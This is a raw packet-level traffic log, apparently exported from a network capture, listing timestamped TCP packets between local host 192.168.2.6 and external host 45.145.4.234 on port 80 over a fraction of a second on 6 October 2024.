                                                                                                                                                Oct 6, 2024 22:18:42.030215979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.031022072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.031028032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.031070948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.031948090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.031963110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.032007933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.032907009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.032917976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.032922983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.032952070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.032968998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.033845901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.033855915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.033885956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.034869909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.034879923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.034915924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.037652016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.037671089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.037674904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.037713051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.037736893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.111450911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.111547947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.111646891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.111653090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.111687899 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.112195969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.112206936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.112230062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.112260103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.112966061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.113002062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.114852905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.114897013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.115015030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.115025043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.115046024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.115065098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.115477085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.115520000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.115782022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.115824938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.115925074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.115956068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.133075953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.133162022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.133230925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.133244038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.133266926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.133285999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.134018898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.134031057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.134059906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.134073973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.134813070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.134824991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.134836912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.134852886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.134862900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.134876966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.135675907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.135687113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.135725021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.136559010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.136576891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.136600018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.136624098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.137444019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.137454987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.137480974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.137497902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.138329983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.138341904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.138353109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.138365030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.138384104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.139214993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.139226913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.139249086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.139277935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.140116930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.140127897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.140147924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.140165091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.140841007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.140851974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.140862942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.140872955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.140891075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.141515970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.141527891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.141551018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.141585112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.142227888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.142239094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.142262936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.142278910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.142925978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.142936945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.142966032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.142982960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.143630028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.143640995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.143668890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.144352913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.144385099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.144392967 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.144418955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.145061970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.145073891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.145085096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.145102978 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.145113945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.145129919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.145759106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.145771980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.145801067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.145812035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.146527052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.146538973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.146564007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.146575928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.194694042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.194780111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.194792986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.194808960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.194824934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.194832087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.195220947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.195235014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.195431948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.195822001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.195863008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.198194027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.198247910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.198339939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.198352098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.198378086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.198389053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.198865891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.198878050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.198906898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.198919058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.199420929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.199460030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.201843977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.201893091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.201973915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.201986074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.202013016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.202023029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.219698906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.219837904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.219845057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.219880104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.219906092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.219940901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.220277071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.220288992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.220326900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.220989943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.221004963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.221014977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.221050978 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.221082926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.221488953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.221503973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.221664906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.222121000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.222132921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.222170115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.222203970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.222851992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.222867012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.222878933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.222898960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.222913027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.223582983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.223597050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.223639965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.223660946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.224308968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.224322081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.224365950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.225004911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.225017071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.225054026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.225085974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.225749969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.225764036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.225805044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.225815058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.226310015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.226322889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.226336956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.226347923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.226356030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.226375103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.226409912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.227165937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.227176905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.227189064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.227217913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.227236032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.228034973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228046894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228060007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228101969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.228111982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.228899956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228912115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228923082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228935003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.228965998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.228992939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.229835033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.229846954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.229860067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.229890108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.229902983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.230614901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.230628014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.230638981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.230662107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.230678082 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.231468916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.231481075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.231492043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.231503963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.231522083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.231542110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.232363939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.232376099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.232388020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.232409000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.232440948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.233100891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.233113050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.233124018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.233138084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.233145952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.233155012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.233174086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.233201981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.234088898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.234098911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.234111071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.234122038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.234143019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.234169960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.235093117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235105038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235115051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235126972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235136032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.235172987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.235943079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235955000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235966921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235977888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.235991955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.235996962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.236025095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.236047983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.236846924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.236857891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.236869097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.236881971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.236893892 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.236929893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.237736940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.237749100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.237760067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.237787962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.237814903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.281405926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.281488895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.281507969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.281526089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.281531096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.281559944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.281919956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.281932116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.281961918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.281981945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.282303095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.282314062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.282347918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.282747030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.282758951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.282772064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.282792091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.282824993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.285012007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285064936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.285136938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285149097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285176039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.285185099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.285556078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285607100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285619974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285631895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.285653114 CEST6388580192.168.2.645.145.4.234
